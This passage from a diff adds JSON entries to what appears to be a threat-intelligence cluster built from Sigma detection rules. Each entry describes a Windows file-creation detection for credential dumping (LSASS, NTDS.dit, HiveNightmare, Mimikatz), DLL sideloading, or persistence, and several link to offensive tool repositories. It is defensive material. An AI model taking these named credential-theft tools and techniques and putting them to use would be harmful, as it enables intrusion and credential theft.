"tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "value": "Dumpert Process Dumper Default File" + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/23", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "filename": "file_event_win_hivenightmare_file_exports.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" + ] + }, + "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export" + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_hktl_nppspy.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage" + }, + { + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. 
This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ] + }, + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking" + }, + { + "description": "TeamViewer_Desktop.exe is create during install", + "meta": { + "author": "frack113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_install_teamviewer_desktop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop" + }, + { + "description": "Detects the presence and execution of Inveigh via dropped artefacts", 
+ "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_inveigh_artefacts.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts" + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "meta": { + "author": "frack113", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" + }, + { + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. 
Typical of Qakbot TTP from end-July 2022.", + "meta": { + "author": "@sam0x90", + "creation_date": "2022/07/30", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "filename": "file_event_win_iso_file_mount.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders" + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "filename": "file_event_win_iso_file_recent.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No 
established tags" + }, + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files" + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive" + }, + { + "description": "Detects programs on a Windows system that should not write executables to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_exe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "value": "Legitimate Application Dropped Executable" + }, + { + "description": "Detects programs on a Windows system that should not write scripts to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + 
"Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script" + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.google.com/search?q=procdump+lsass", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files" + }, + { + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation" + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_werfault_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump" + }, + { + "description": "A office file with macro is created from a commandline or a script", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": 
"file_event_win_macro_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_mal_adwind.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact" + }, + { + "description": "Detects Octopus Scanner Malware.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_mal_octopus_scanner.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 
"https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ + "attack.t1195", + "attack.t1195.001" + ] + }, + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware" + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/10/25", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "file_event_win_mal_vhd_download.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser" + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + 
"attack.credential_access", + "attack.t1558" + ] + }, + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation" + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "meta": { + "author": "David ANDRE", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimimaktz_memssp_log_file.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit" + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "meta": { + "author": "Vadim Varganov, Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_msdt_autorun.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": 
"windows", + "refs": [ + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" + ] + }, + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory" + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_net_cli_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact" + }, + { + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "value": "Creation Suspicious File In Uncommon AppData Folder" + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/04/27", + "falsepositive": [ + "The installation of new screen savers." + ], + "filename": "file_event_win_new_src_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event" + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins" + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation" + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + 
"meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_exfil_tools.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns" + }, + { + "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/11", + "falsepositive": [ + "Legitimate add-ins" + ], + "filename": "file_event_win_office_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "value": "Microsoft Office Add-In Loading" + }, + { + "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. 
VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "User genuinly creates a VB Macro for their email" + ], + "filename": "file_event_win_outlook_c2_macro_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "value": "Outlook C2 Macro Creation" + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_outlook_newform.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ] + }, + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation" + }, + { + "description": "Detects processes creating temp files related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_pcre_net_temp_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": 
"windows", + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback Backdoor - File" + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "meta": { + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "creation_date": "2018/04/07", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_powershell_exploit_scripts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/NetSPI/PowerUpSQL", + 
"https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlet Names" + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
